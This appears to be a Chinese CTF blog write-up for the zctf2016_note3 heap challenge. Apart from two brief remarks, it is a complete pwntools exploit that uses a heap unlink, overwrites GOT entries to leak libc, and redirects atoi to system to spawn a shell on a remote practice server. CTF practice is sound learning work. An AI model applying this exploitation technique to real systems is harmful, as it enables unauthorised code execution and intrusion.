Loading... <!-- wp:paragraph --> <p>这道题几乎就是<strong><span class="external-link"><a class="no-external-link" href="https://www.cjovi.icu/?p=829" target="_blank"><i data-feather="external-link"></i>zctf2016_note2</a></span></strong>和<strong><a rel="noreferrer noopener" href="https://www.cjovi.icu/?p=810" target="_blank">hitcon2014_stkof</a></strong>的结合体,wiki上的解法好复杂的感觉,不是我这种菜鸡能够理解的,最后我还是用上面两个题目的结合方法来pwn的,就直接放exp吧,我觉得没什么可说的</p> <!-- /wp:paragraph --> <!-- wp:code --> <pre class="wp-block-code"><code>#!/usr/bin/env python # coding=utf-8 from pwn import * def new_note(size,payload): sh.sendlineafter("--->>\n",'1') sh.sendlineafter("(less than 1024)\n",str(size)) sh.sendlineafter("content:\n",payload) def edit(index,payload): sh.sendlineafter("--->>\n","3") sh.sendlineafter("id of the note:\n",str(index)) sh.sendlineafter("new content:\n",payload) def free(index): sh.sendlineafter("--->>\n","4") sh.sendlineafter("note:\n",str(index)) #sh = process("./note2") sh = remote("node3.buuoj.cn","25686") context(log_level = 'debug') note_ptr_array = 0x6020C8 elf = ELF("./zctf_2016_note3") libc = ELF("./buu-libc-2.23.so") payload = 'a' * 8 + p64(0x61) + p64(note_ptr_array - 0x18) + p64(note_ptr_array - 0x10) payload += 'a' * 64 + p64(0x60) new_note(0x80,payload) new_note(0,'none') new_note(0x80,'none') free(1) payload = 'a' * 16 + p64(0x90 + 0x20 - 0x10) + p64(0x90) new_note(0,payload) free(2) payload = 'a' * 0x18 + p64(elf.got["free"]) + p64(elf.got["atoi"]) * 2 edit(0,payload) edit(0,p64(elf.symbols["puts"])[:-1]) free(1) atoi_addr = u64(sh.recv(6).ljust(8,'\x00')) system_addr = atoi_addr - libc.symbols["atoi"] + libc.symbols["system"] edit(2,p64(system_addr)) sh.sendlineafter("--->>\n",'/bin/sh') sh.interactive() </code></pre> <!-- /wp:code --> <!-- wp:paragraph --> <p>说实话几乎是一样的,那一年这两题大概是pwn了一题就有另一题了吧,想到这我倒是有点好奇有没有note1</p> <!-- /wp:paragraph --> 最后修改:2021 年 01 月 02 日 © 允许规范转载 打赏 赞赏作者 支付宝微信 赞 0 如果觉得我的文章对你有用,那听听上面我喜欢的歌吧